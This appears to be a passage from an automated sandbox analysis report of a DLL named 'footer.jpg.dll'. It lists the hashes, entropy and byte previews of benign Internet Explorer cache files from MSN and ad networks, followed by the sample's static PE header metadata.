IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dylAK.img?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jpg&x=300&y=149
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..#h...q..L..MK..z.+.......".yT...S@.#fRH.../.)....J...BlN).+.a.P...V..W..#..O..1..q.Tb\|z..p.0d.Xpzb.;.(....l.WQ..f.<.U.9=....&.2g.".Q..d.In.....x..N./..D2.....Oh......#.......5..AU....a3\J......@T..r3.T...<..c......q..T.T....$Y.........GNq..zu.p..Lc..A..+X........b.9.&...Mjy.9.+N..z.s.)F*I.1b..t..$...t.d.M.OZ..;SKP.3.9.D..^..fa...V.L...2.[..5.......V6.1.O

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1dyofV[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	downloaded
Size (bytes):	8535
Entropy (8bit):	7.927553537884827
Encrypted:	false
SSDEEP:	192:BCqI3IuNCoTqA591/tLrjFZSWV0W2dDRHKAb+yFIew0sGT6UWqqKqm3:kqIXhqsPr5Z0W2RRT+y2FGTqKqM
MD5:	174EF45923CC446DC02509B4F2C4D879
SHA1:	9E1EE023F4E42909B94214514E29C9518D49295C
SHA-256:	6771A2535DA7F5062DC47B83E1F82C6E1E63D83E5FA2CAB4250B31BA6EFA818B
SHA-512:	EC7A2A7A2563562B05A5F9B99CC98215FF6225761B653114FAC38E9DD2F6F9A439A2A3894AD2FDE7002A1F3AB0E434C030B9AA811D426F57AB6959B610B9EED1
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dyofV.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...I(Kz..#..'x...U.3q..z......?.O....V...K.4jv.....P;JN..5...$#....2....i.s........[....r....,....m8.}1..S....H1n...DH..?..I.1..V........i-....##..TI.....2.w.ZQ ./q.v...X...Z.r%.b>I.o....^..\.......m....i..]./......).....p..E.#.G0...F...H?.d...:M'.?..io`#.-.......;.6...$$..#..Ra.U.S...@..y..?..J..B....?.VxQ.8.}*...ym.}.?.R..8.T.......V.d.L..@.._.....ab

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1dyqU3[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	19086
Entropy (8bit):	7.960625907581167
Encrypted:	false
SSDEEP:	384:etyYklq+Bl5yeb4YhpzpLnyd4AiLQeuQcbUhAU0EU7ZZFUjleLn:eMYkbBX8cpLydzVXQAUhAU0E4zLn
MD5:	784E3BAF0475E57CF22B810B861153A0
SHA1:	7704AB8E7996911E452F368CC56B9D43EA7C9810
SHA-256:	EA2F507BC34E41F33C5E185FC82115702D5DABBB805D4AB1D7BC1F95EE3A1751
SHA-512:	07AC7707C5A5D5241F1C2DF9472318BF6739F5019E372990BFD92A6E0688C6F342792EEA8D86495094AA13A24E1ACC969B84A255C22D5516DAC84F1CFA202CA7
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dyqU3.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=2090&y=1410
Preview:	......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....2......\|<.\|...r...V.).f.G......8 ..-..#>.....f..?...(x.BH.X..k.F.W5A.....C.....+;.1N3R..1GZxQL...Q.H.M+..1.A.... .M)...3...:.c...".;y.lWt.=.F.+Vl..l...c.Ls....f..}.R.2h..g..&.M ...;.....9..:.g{..l'e.6.<..r#...)&.C.}.....iB.s.i.e.....Pq.H.`0..j....rk?.O..b.m.:..J.Z.c.p.1.U..4.I.f.......S...b......Q..sJ..Pww.0.._J]..M..;.z.rHa3L.F.3..,-...cP..5...?d.i

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1dyw1H[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	17625
Entropy (8bit):	7.943180928315256
Encrypted:	false
SSDEEP:	384:efPM1YOJcNFqZEhYutQiaepDpGdOx/FLZfj:efE1XJcNOEhhJaeptdxXfj
MD5:	D744943134C9E3AD4D745DF1772F469F
SHA1:	4C4206C04A0D93053D72DEB1AEC6B6CFD4CC0267
SHA-256:	8328037E050E41CA99ADA6DA656594E1EF75FAC6007C4172941FF2323E680BC6
SHA-512:	BB97E641543732B88D732DA055917BA11D21745794ECACD436AD8A79AE15C5706028C45EF0F28E760BF9C9158E7FB5B1BB51EF1EE319D7C3AEC0988BE69EA30C
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dyw1H.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=168&y=531
Preview:	......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E! u"...(..3.Jb..y.uo...cI...M.IQ.4p.ep..{c..[.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1kKUu[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	1430
Entropy (8bit):	7.791376989273025
Encrypted:	false
SSDEEP:	24:YY5ldMg2oMJ3fnrkz7qZcT16JqIGymtw2KZ0ma831/ksa5+sRYwy61:1ldMfoCfn4HqZcR64PyADma831/ksmRB
MD5:	57BFBA58121A3D894DFB80809B887300
SHA1:	5A7527532F7599A9C5658C433824FD949FA749EE
SHA-256:	CE8E72A19E7457D1F386C2043B91CC5901D422C65AB6C350BA3D8F981058567A
SHA-512:	8BE7C1C812C9684D17396D9264B9BFD4104C1090032B97CEB3AC9FDA301E78E60CF41DD8B0477E840CBF392B8F0A1A70DB3D58D627EE36B061EA7F34A1005794
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kKUu.img?m=6&o=true&u=true&n=true&w=30&h=30
Preview:	.PNG........IHDR.............;0......sRGB.........gAMA......a.....pHYs..........o.d...+IDATHK.V.L.U.~..^.zC ..X.1.X9.n.a.l...H[,..P..e4.......6g....t-.a..$f?.........V...H...;=....{...lg....<.}.{..a...E;.0.......\.T...a.~.....K.lk?.n".3.L.I.(..R.6.....T..uc.....!....@..U......n...6lfo'7P"F`.t..K...d.Tp....h.Q.\"i.M;i9CG'5..}3.'...l?Ke....;{...k. V......<.....2..Y.0#.:......N.pRnD..z.q..R..B.jC...&n.v...b..^.iX5.e..>M......+./P..T.#.O.\|?.\W..S.F..[.~Rk?!Y.h.bVe.VF./7CR.?..&G.P.I..h..S.B....].._r......g.4c.Fy..I%h......3n.B....J......bG.e..>)B....eI....1e#v9.........M....E.OTUU.y.._4..h..Q..J...?.F.5........=.}......g.....................r.....=s..k.*f.q.@6.....T....$...t5.fo.x..orssS...=.3!....Dcc...Meee..!.\|..Y..L,F..yC.R.jF..F,....{.....o.[N.5x.....t6...Y,....[........\|.>.v...MZF.q$7..G........d2....G...i<CSQQ...t&d.........f...i.E.L..Q..[.~.^.p\|]...f+...DX..c511...PO{!....!.??>>.K..}....W..555k.c7#..W....Q]]..!!.>.TO...e..P....._).....r.n ..#]....e

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\a8a064[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 28 x 28
Category:	downloaded
Size (bytes):	16360
Entropy (8bit):	7.019403238999426
Encrypted:	false
SSDEEP:	384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
MD5:	3CC1C4952C8DC47B76BE62DC076CE3EB
SHA1:	65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
SHA-256:	10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
SHA-512:	5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Preview:	GIF89a.......dbd...........lnl.........trt..................!..NETSCAPE2.0.....!.......,..........+..I..8...`(.di.h..l.p,..(.........5H.....!.......,.........dbd...........lnl......dfd....................../..I..8...`(.di.h..l..e.....Q... ..-.3...r...!.......,.........dbd..............tvt...........................*P.I..8...`(.di.h.v.....A<.. ......pH,.A..!.......,.........dbd........\|~\|......trt...ljl.........dfd......................................................B`%.di.h..l.p,.t]S......^..hD..F. .L..tJ.Z..l.080y..ag+...b.H...!.......,.........dbd.............ljl.............dfd........lnl..............................................B.$.di.h..l.p.'J#............9..Eq.l:..tJ......E.B...#.....N...!.......,.........dbd...........tvt.....ljl.......dfd.........\|~\|.............................................D.$.di.h..l.NC.....C...0..)Q..t...L:..tJ.....T..%...@.UH...z.n.....!.......,.........dbd..............lnl.........ljl......dfd...........trt...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\e151e5[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	downloaded
Size (bytes):	43
Entropy (8bit):	3.122191481864228
Encrypted:	false
SSDEEP:	3:CUTxls/1h/:7lU/
MD5:	F8614595FBA50D96389708A4135776E4
SHA1:	D456164972B508172CEE9D1CC06D1EA35CA15C21
SHA-256:	7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
SHA-512:	299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Preview:	GIF89a.............!.......,...........D..;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\errorPageStrings[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	4720
Entropy (8bit):	5.164796203267696
Encrypted:	false
SSDEEP:	96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
MD5:	D65EC06F21C379C87040B83CC1ABAC6B
SHA1:	208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256:	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512:	8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious:	false
IE Cache URL:	res://ieframe.dll/errorPageStrings.js
Preview:	.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\http___cdn.taboola.com_libtrc_static_thumbnails_6e48d98e54480395a753455bdb6d291b[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	13280
Entropy (8bit):	7.927958928936435
Encrypted:	false
SSDEEP:	384:weUjW8l4cB8zIGjfvzCx2w3izDXHgetf3tXv:rUjhpWzIkGx2TIe/Xv
MD5:	86D0078A35B41F001AA5C6D334F6D581
SHA1:	97B6BB69C3CD58BCEF9EAD4F8B9CBDF35601DBE2
SHA-256:	079421854D849EDC7820C462CF65FB2C2BCF672C80C92E0D3C3393886802D1B8
SHA-512:	7393CE0A0378347BEE389DF829FB24BDA8071960C432D45391D541FC3FE3940C554E7D6885BDA287466E53E8FD9376D1AF2C367ACC14F5A42C65327B25944BB6
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%2Cg_xy_center%2Cx_630%2Cy_311/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F6e48d98e54480395a753455bdb6d291b.png
Preview:	......JFIF.....................................................................&""&0-0>>T.............................)......)$,$!$,$A3--3AK?<?K[QQ[rlr.........7...............6.......................................................................................................(Z.uN8........r2.9.../q..y.W=...D.........n.*..s.aNW.ON..............=?..(./X..^W.......SU...._x.t$....(....#...mr.@..._cwq...aD.....O.R....,.P..Ui.~.x..bc...3......>...."..).(.>.l.#..6:..F..]..ivq..z3h..1.......c..7...........h...:..SDQO......."......x...u9Zi..O.j.b../.z...m..yg.sDx^..l...h. ..+M;.........V.....z.k.Z.e.....OW...).(...". ..C\|..V.......vPE..II.$...A...VO..........uuR..t^.'...... ....E....yV.p.QV..=..&G..S....F.=..-.'.i..JH).SF./pR&.....`....\|(.U..c}.~\..k....S..MPRS..._.^..4....s. ..1.k....:.....V.j...F.n..t....\|..0.......,g..VG.....]..'.^.a...5;B....;..Y.........6F.,...7.l}.-..6wgG.+.......n.%:Z...sli..E.xw;].....~Ui..-......1..s.wU5GafYt~!ve....>...tw..`....Ff..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\http___cdn.taboola.com_libtrc_static_thumbnails_a518460a863f2cffbec1b08da16b564a[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	28854
Entropy (8bit):	7.9831119793798075
Encrypted:	false
SSDEEP:	768:xbfYT/fnifC8uK1hIKeZA8d1+l5ib6eOMayasj+CWOz0my:xL48uK1hI7dwubQSf+ZUy
MD5:	CA2997D3A13BFF2B2DBEF9B9AAC20BDD
SHA1:	BE5E88F4E1688B7C3ADC6F4C2BAA6CD0A9C79677
SHA-256:	FD9A2165D52B9EE13B75A97C1F4B2ED3C02C02033C3A37DC8276457F8712AC03
SHA-512:	7C3C99E6CF65EF373CED321F93644ABFAA5799934096288F607B110B4815C670D33E6EBD4ED3B883A8D8714A281168E2CD99ADC170A193CCD52782CEF979968D
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fa518460a863f2cffbec1b08da16b564a.jpg
Preview:	......JFIF....................................................!...!.1&""&18/-/8D==DVQVpp..............................+......+&.%#%.&D5//5DNB>BN_UU_wqw.........7...............5..................................................................L.E".H.R)..E".H...L=Ls6..8.H..d5xi.G...E".H.R)..E".H,..x...........J....W......t/0...Gw...H.R)..E".H..c........V3...&%..8...5...7.#F.i.B....g....".H.R)..N.NwG.....Fz3V...=%ly4...Ay...S.....s3G......G.}..M.H.R)...^t.u!..u..IV.=..3w.1h4A...}.W...%.t.y.........O..Y.J.QO...V.R....Y..........\|.r}....G..-\|..d.O..v...tr...n?.b........./.R..q.S8....F.{ .4.F.g.4p...:q:...~M`.k.}.{.....x.G'....u"..H....f81.........dG..c...<.S...Lz....s....M.8Xg....Z......Ru,...y...`..}.)...7M.^.g~.}..y-...O....m...YS$s6.......".....\|]s%#U.....5.>U..i....L..q..'...;.M...:.7b...Y........n..]..)I\..!.....{Z.>.V.a.......w....9....{.{:Un.........../....t2..C .2.S7M.W..P.g.R..F}.:.'..(s..........us..L..a...z....;..J..G.=S.U.u...]Ti..oJ.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\nrrV63415[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	88151
Entropy (8bit):	5.422933393659934
Encrypted:	false
SSDEEP:	1536:DVnCuukXGsQihGZFu94xdV2E4535nJy0ukWaacUvP+i/TX6Y+fj4/fhAaTZae:DQiYpdVG7tubpKY+fjwZ
MD5:	58A026779C60669E6C3887D01CFD1D80
SHA1:	FBD57BDE06C3D832CC3CB10534E22DCFC7122726
SHA-256:	E4F1EDDBAD7B7F149B602330BD1D05299C3EB9F3ECB4ABD5694D02025A9559C9
SHA-512:	263AD21199F2F5EB3EF592E80D9D0BD898DED3FAFFDD14C34B1D5641D0ABD62FB03F0A738B88681FB3B65B5C698B5D6294DD0D8EAAED9E102B50B9D1DB6E6E8F
Malicious:	false
IE Cache URL:	https://contextual.media.net/48/nrrV63415.js
Preview:	var _mNRequire,_mNDefine;!function(){"use strict";var c={},u={};function a(e){return"function"==typeof e}_mNRequire=function e(t,r){var n,i,o=[];for(i in t)t.hasOwnProperty(i)&&("object"!=typeof(n=t[i])&&void 0!==n?(void 0!==c[n]\|\|(c[n]=e(u[n].deps,u[n].callback)),o.push(c[n])):o.push(n));return a(r)?r.apply(this,o):o},_mNDefine=function(e,t,r){if(a(t)&&(r=t,t=[]),void 0===(n=e)\|\|""===n\|\|null===n\|\|(n=t,"[object Array]"!==Object.prototype.toString.call(n))\|\|!a(r))return!1;var n;u[e]={deps:t,callback:r}}}();_mNDefine("modulefactory",[],function(){"use strict";var r={},e={},o={},i={},n={},t={},a={};function c(r){var e=!0,o={};try{o=_mNRequire([r])[0]}catch(r){e=!1}return o.isResolved=function(){return e},o}return r=c("conversionpixelcontroller"),e=c("browserhinter"),o=c("kwdClickTargetModifier"),i=c("hover"),n=c("mraidDelayedLogging"),t=c("macrokeywords"),a=c("tcfdatamanager"),{conversionPixelController:r,browserHinter:e,hover:i,keywordClickTargetModifier:o,mraidDelayedLogging:n,macroKeyw

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\otFlat[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	12588
Entropy (8bit):	5.376121346695897
Encrypted:	false
SSDEEP:	192:RtmLMzybpgtNs5YdGgDaRBYw6Q3gRUJ+q5iwJlLd+JmMqEb5mfPPenUpoQuQJ/Qq:RgI14jbK3e85csXf+oH6iAHyP1MJAk
MD5:	AF6480CC2AD894E536028F3FDB3633D7
SHA1:	EA42290413E2E9E0B2647284C4BC03742C9F9048
SHA-256:	CA4F7CE0B724E12425B84184E4F5B554F10F642EE7C4BE4D58468D8DED312183
SHA-512:	A970B401FE569BF10288E1BCDAA1AF163E827258ED0D7C60E25E2D095C6A5363ECAE37505316CF22716D02C180CB13995FA808000A5BD462252F872197F4CE9B
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/otFlat.json
Preview:	.. {.. "name": "otFlat",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtYmFubmVyLXNkayIgY2xhc3M9Im90RmxhdCI+PGRpdiBjbGFzcz0ib3Qtc2RrLWNvbnRhaW5lciI+PGRpdiBjbGFzcz0ib3Qtc2RrLXJvdyI+PGRpdiBpZD0ib25ldHJ1c3QtZ3JvdXAtY29udGFpbmVyIiBjbGFzcz0ib3Qtc2RrLWVpZ2h0IG90LXNkay1jb2x1bW5zIj48ZGl2IGNsYXNzPSJiYW5uZXJfbG9nbyI+PC9kaXY+PGRpdiBpZD0ib25ldHJ1c3QtcG9saWN5Ij48aDMgaWQ9Im9uZXRydXN0LXBvbGljeS10aXRsZSI+VGhpcyBzaXRlIHVzZXMgY29va2llczwvaDM+PCEtLSBNb2JpbGUgQ2xvc2UgQnV0dG9uIC0tPjxkaXYgaWQ9Im9uZXRydXN0LWNsb3NlLWJ0bi1jb250YWluZXItbW9iaWxlIiBjbGFzcz0ib3QtaGlkZS1sYXJnZSI+PGJ1dHRvbiBjbGFzcz0ib25ldHJ1c3QtY2xvc2UtYnRuLWhhbmRsZXIgb25ldHJ1c3QtY2xvc2UtYnRuLXVpIGJhbm5lci1jbG9zZS1idXR0b24gb3QtbW9iaWxlIG90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIEJhbm5lciIgdGFiaW5kZXg9IjAiPjwvYnV0dG9uPjwvZGl2PjwhLS0gTW9iaWxlIENsb3NlIEJ1dHRvbiBFTkQtLT48cCBpZD0ib25ldHJ1c3QtcG9saWN5LXRleHQiPldlIHVzZSBjb29raWVzIHRvIGltcHJvdmUgeW91ciBleHBlcmllbmNlLCB0byByZW1lbWJlciBsb2ctaW4gZGV0YWlscywgcHJvdmlkZSBzZWN1cmUgbG9

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\otPcCenter[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	46394
Entropy (8bit):	5.58113620851811
Encrypted:	false
SSDEEP:	384:oj+X+jzgBCL2RAAaRKXWSU8zVrX0eQna41wFpWge0bRApQZInjatWLGuD3eWrwAs:4zgEFAJXWeNeIpW4lzZInuWjlHoQthI
MD5:	145CAF593D1A355E3ECD5450B51B1527
SHA1:	18F98698FC79BA278C4853D0DF2AEE80F61E15A2
SHA-256:	0914915E9870A4ED422DB68057A450DF6923A0FA824B1BE11ACA75C99C2DA9C2
SHA-512:	D02D8D4F9C894ADAB8A0B476D223653F69273B6A8B0476980CD567B7D7C217495401326B14FCBE632DA67C0CB897C158AFCB7125179728A6B679B5F81CADEB59
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/v2/otPcCenter.json
Preview:	.. {.. "name": "otPcCenter",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtcGMtc2RrIiBjbGFzcz0ib3RQY0NlbnRlciBvdC1oaWRlIG90LWZhZGUtaW4iIGFyaWEtbW9kYWw9InRydWUiIHJvbGU9ImRpYWxvZyIgYXJpYS1sYWJlbGxlZGJ5PSJvdC1wYy10aXRsZSI+PCEtLSBDbG9zZSBCdXR0b24gLS0+PGRpdiBjbGFzcz0ib3QtcGMtaGVhZGVyIj48IS0tIExvZ28gVGFnIC0tPjxkaXYgY2xhc3M9Im90LXBjLWxvZ28iIHJvbGU9ImltZyIgYXJpYS1sYWJlbD0iQ29tcGFueSBMb2dvIj48L2Rpdj48YnV0dG9uIGlkPSJjbG9zZS1wYy1idG4taGFuZGxlciIgY2xhc3M9Im90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIj48L2J1dHRvbj48L2Rpdj48IS0tIENsb3NlIEJ1dHRvbiAtLT48ZGl2IGlkPSJvdC1wYy1jb250ZW50IiBjbGFzcz0ib3QtcGMtc2Nyb2xsYmFyIj48aDMgaWQ9Im90LXBjLXRpdGxlIj5Zb3VyIFByaXZhY3k8L2gzPjxkaXYgaWQ9Im90LXBjLWRlc2MiPjwvZGl2PjxidXR0b24gaWQ9ImFjY2VwdC1yZWNvbW1lbmRlZC1idG4taGFuZGxlciI+QWxsb3cgYWxsPC9idXR0b24+PHNlY3Rpb24gY2xhc3M9Im90LXNkay1yb3cgb3QtY2F0LWdycCI+PGgzIGlkPSJvdC1jYXRlZ29yeS10aXRsZSI+TWFuYWdlIENvb2tpZSBQcmVmZXJlbmNlczwvaDM+PGRpdiBjbGFzcz0ib3QtcGxpLWhkciI+PHNwYW4gY2xhc3M9Im90LWxpLXRpdGxlIj5Db25zZW50PC9

Static File Info

General
File type:	MS-DOS executable, MZ for MS-DOS
Entropy (8bit):	5.850839808832977
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	footer.jpg.dll
File size:	293744
MD5:	9df5fcca1aadec6333301aca7a13c481
SHA1:	f3445c636e0a702eff7782b9e8eeb4ca84f842ff
SHA256:	8df914f790a6e5eb07042cce36ea9a23e23cdc1610d930f306f9ef55b6d8a2c5
SHA512:	c1bb8d9ce6f014cc6c1dd68e767c03bbc4d56875f792d2f994f5740ad2d23ab75d3caa9b9d9778fab903685db4f87c1b999756e5b3a971dec1a405cad5ac17ad
SSDEEP:	6144:SExImdn3y5LQv+0az3d1jDbj950ylG+OhZHoTV43:SExTn34Qv+rz3/jDbj950ylG+AZH+V43
File Content Preview:	MZ......................................................................!..L.!This -7Afram cannot be run in DOS mode....$.......PE..L..................!.....~..........(*............@..........................p......kz..............................\......

File Icon


Icon Hash:	8f9b9b9b9b9e9e8d

Static PE Info

General
Entrypoint:	0x402a28
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d9b84120fbcc594b075c19efa9f388ec

Authenticode Signature

Signature Valid:	false
